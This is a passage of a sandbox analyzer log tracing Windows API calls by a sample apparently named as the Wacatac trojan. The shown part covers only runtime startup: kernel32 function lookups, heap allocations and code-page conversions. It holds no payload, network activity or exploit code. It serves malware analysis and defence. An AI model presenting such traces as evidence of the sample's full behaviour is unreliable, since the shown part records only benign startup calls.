# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 20.11.2019 23:55:11.389 Process: id = "1" image_name = "wacatac_2019-11-20_23-34.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_23-34.exe" page_root = "0x501b9000" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x93c [0023.364] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xfedc14a0, dwHighDateTime=0x1d59ffd)) [0023.364] GetCurrentThreadId () returned 0x93c [0023.364] GetCurrentProcessId () returned 0x938 [0023.364] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=14350142386) returned 1 [0023.364] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0023.365] GetProcessHeap () returned 0x280000 [0023.366] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0023.366] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0023.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0023.368] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0023.369] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3bc) returned 0x293e88 [0023.369] GetCurrentThreadId () returned 0x93c [0023.369] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x18) returned 0x290da0 [0023.369] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x800) returned 0x294250 [0023.369] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40920d, hStdOutput=0xa85c4054, hStdError=0x0)) [0023.369] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0023.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0023.369] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0023.369] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe\" " [0023.369] GetEnvironmentStringsW () returned 0x294a58* [0023.369] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xaca) returned 0x295530 [0023.370] FreeEnvironmentStringsW (penv=0x294a58) returned 1 [0023.370] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x42a268, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_23-34.exe")) returned 0x42 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8e) returned 0x290dc0 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x98) returned 0x294a58 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3e) returned 0x294af8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6c) returned 0x294b40 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6e) returned 0x294bb8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x78) returned 0x291008 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x62) returned 0x294c30 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x294ca0 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x294cd8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x294d28 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x293920 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4a) returned 0x294d58 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x72) returned 0x291088 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x294db0 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x294de8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1c) returned 0x293948 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xd2) returned 0x294e20 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x7c) returned 0x294f00 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x294f88 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3a) returned 0x294fc8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x90) returned 0x295010 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x2950a8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x2950d8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x295110 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x295150 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x2951a0 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x295200 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x82) returned 0x295248 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x2952d8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1e) returned 0x293970 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2c) returned 0x295310 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x295348 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x2953a8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2a) returned 0x295408 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x295440 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x295488 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x2954e8 [0023.370] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x296008 [0023.371] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8c) returned 0x296040 [0023.371] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295530 | out: hHeap=0x280000) returned 1 [0023.371] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x295518 [0023.372] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.372] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.372] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x800) returned 0x2955a0 [0023.372] GetLastError () returned 0x0 [0023.372] SetLastError (dwErrCode=0x0) [0023.372] GetLastError () returned 0x0 [0023.372] SetLastError (dwErrCode=0x0) [0023.372] GetLastError () returned 0x0 [0023.372] SetLastError (dwErrCode=0x0) [0023.372] GetACP () returned 0x4e4 [0023.372] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x295da8 [0023.372] GetLastError () returned 0x0 [0023.372] SetLastError (dwErrCode=0x0) [0023.372] IsValidCodePage (CodePage=0x4e4) returned 1 [0023.372] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0023.372] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0023.372] GetLastError () returned 0x0 [0023.372] SetLastError (dwErrCode=0x0) [0023.372] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.372] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0023.372] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0023.373] GetLastError () returned 0x0 [0023.373] SetLastError (dwErrCode=0x0) [0023.373] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.373] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0023.373] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.373] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0023.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÄA\\¨äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0023.373] GetLastError () returned 0x0 [0023.373] SetLastError (dwErrCode=0x0) [0023.373] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.373] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0023.373] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.373] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0023.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 